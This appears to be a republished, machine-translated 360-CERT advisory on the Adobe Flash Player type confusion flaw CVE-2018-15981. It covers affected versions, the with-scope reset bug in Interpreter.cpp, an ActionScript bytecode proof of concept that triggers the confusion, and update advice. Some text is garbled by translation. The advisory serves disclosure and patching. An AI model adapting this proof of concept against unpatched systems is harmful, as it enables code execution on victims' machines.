Shulou(Shulou.com)06/01 Report--

How to achieve Adobe Flash Player arbitrary code execution vulnerability CVE-2018-15981 early warning, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

0x00 event background

Late last night, Adobe released an Adobe Flash Player security update for Windows,macOS,Linux and Chrome OS, patching a type confusion vulnerability (CVE-2018-15981). This vulnerability affects Adobe Flash Player 31.0.0.148 and previous versions, and successful exploitation could lead to arbitrary code execution. Based on the analysis of the vulnerability, 360-CERT believes that the vulnerability is not difficult to exploit and has a wide range of influence and serious harm.

Vulnerability Analysis of 0x01 influence range Product version platform Adobe Flash Player Desktop Runtime31.0.0.148 and earlier versionsWindows, macOS and LinuxAdobe Flash Player for Google Chrome31.0.0.148 and earlier versionsWindows, macOS, Linux and Chrome OSAdobe Flash Player for Microsoft Edge and Internet Explorer 1131.0.0.148 and earlier versionsWindows 10 and 8.10x02

The vulnerability lies in the Interpreter.cpp file: when handling exceptions, Flash resets many variables of the state machine and sets the PC of the interpreter to the address of the target handler. However, this process is overoptimized and does not reset the with-scope variable. An attacker can construct a malicious flash file, throw an exception after the object is loaded, and modify the type of member variables of the object, resulting in type confusion.

In the Interpreter.cpp source code, a withBase variable is defined to be used as the pointer offset of the scopeBase array

Register Atom* const scopeBase = framep + ms- > local_count ()

Register Atom* volatile withBase = NULL

NONDEBUGGER_ONLY (register) int volatile scopeDepth = 0

Register ScopeChain* const scope = env- > scope ()

This variable is called at the handler of the findproperty instruction.

INSTR (findproperty) {

B1 = false

Findproperty_impl:

SAVE_EXPC

GET_MULTINAME_PTR (multiname, U30ARG)

If (multiname- > isRuntime ())

{

Aux_memory- > multiname2 = * multiname

Sp = initMultiname (env, aux_memory- > multiname2, sp)

Multiname = & aux_memory- > multiname2

}

* (+ + sp) = env- > findproperty (scope, scopeBase, scopeDepth, multiname, b1, withBase)

NEXT

}

Therefore, the vulnerability can be exploited by using findproperty instructions. The PoC utilized is as follows:

Getlocal0

Pushscope

Getlocal0

Findpropstrict QName (PackageNamespace (")," NewClass2 ")

Constructprop QName (PackageNamespace (")," NewClass2 "), 0

Initproperty QName (PackageInternalNs (")," myvar ")

Getlocal0

Pushwith

L10:

Pushbyte 1

Throw

L12:

Nop

L16:

Getlocal0

Pushscope

Pushint 534568

Newobject 1

Coerce QName (PackageNamespace (")," Object ")

Pushscope

Findproperty Multiname ("myvar", [PackageInternalNs ("), PackageNamespace (")])

Getproperty Multiname ("myvar", [PackageInternalNs ("), PackageNamespace (")])

Getslot 1

Returnvoid

0x03 security recommendations

The vulnerability is not difficult to exploit and has a wide range of influence and serious harm. Therefore, 360-CERT strongly recommends that users update Adobe Flash Player.

Now that the patch has been released, users can use the "update" feature within the software, or visit https://www.flash.cn/ to download the latest version of the application.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.